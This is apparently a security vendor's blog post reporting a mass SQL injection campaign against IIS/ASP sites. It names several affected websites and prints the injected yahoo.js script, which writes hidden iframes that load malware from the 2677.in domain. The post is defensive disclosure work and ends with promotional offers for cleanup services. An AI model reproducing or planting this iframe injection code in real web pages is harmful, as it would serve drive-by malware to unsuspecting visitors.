Mass infection of IIS/ASP sites – 2677.in/yahoo.js

A large number of sites have been hacked again in the last few hours with a malware script pointing to http://2677.in/yahoo.js . Not only small sites, but some big ones got hit as well. It is the same SQL injection attack as used in the robint-us mass infection of a few days ago.

Some of the sites hacked this time:

http://www.ameristar.com/

http://www.servicewomen.org

http://www.chicagopublicradio.org

http://www.industryweek.com

http://www.booksellerandpublisher.com.au

http://www.spain-holiday.com

This time Google says that around 1 thousand pages have been infected. This is the content of the yahoo.js script:

try{__m}catch(e){__m=1;document.title=document.title.replace(/\<(\w|\W)*\> /,””);document.write(“< iframe src=http://2677.in/cnzz.html width=0 height==>
<iframe src=http://2677.in/ie.html width=22 height=1

So it loads malware from http://2677.in/ie.html, which then calls http://s11.cnzz.com to load the virus. This is the output of our scan agaisnt ameristar.com:

What is funny is that one of the top pages that got hacked was https://www.idera.com and their seminar about “Understanding SQL Server Security Options”. Just search on Google for “”http://2677.in/yahoo.js” inurl:.idera.com” to see it.

If your site is hacked (or contains malware), and you need help, send us an email at support@sucuri.net or visit our site: Sucuri Security. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.